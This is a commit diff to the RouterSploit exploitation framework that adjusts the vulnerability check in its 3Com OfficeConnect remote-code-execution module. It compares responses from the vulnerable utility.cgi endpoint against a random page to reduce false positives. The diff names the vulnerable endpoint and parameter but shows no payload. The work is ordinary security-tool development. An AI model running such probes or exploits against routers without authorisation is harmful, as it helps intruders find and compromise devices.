Fixing false positives Officeconnect RCE

4d4faaac · Marcin Bury · 6a60de9d · 4d4faaac
Commit 4d4faaac authored Aug 08, 2016 by Marcin Bury
Show whitespace changes
Inline Side-by-side

Showing with 7 additions and 3 deletions

officeconnect_rce.py routersploit/modules/exploits/3com/officeconnect_rce.py +7 -3

No files found.
--- a/routersploit/modules/exploits/3com/officeconnect_rce.py
+++ b/routersploit/modules/exploits/3com/officeconnect_rce.py
@@ -7,6 +7,7 @@ from routersploit import (
    http_request,
    mute,
    validators,
+    random_text,
 )


@@ -65,11 +66,14 @@ class Exploit(exploits.Exploit):
    def check(self):
        url = "{}:{}/utility.cgi?testType=1&IP=aaa".format(self.target, self.port)

-        response = http_request(method="GET", url=url)
-        if response is None:
+        response1 = http_request(method="GET", url=url)
+        if response1 is None:
            return False  # target is not vulnerable

-        if response.status_code == 200:
+        if response1.status_code == 200:
+            url = "{}:{}/{}.cgi".format(self.target, self.port, random_text(32))
+            response2 = http_request(method="GET", url=url)
+            if response2 is None or response1.text != response2.text:
                return True  # target is vulnerable

        return False  # target is not vulnerable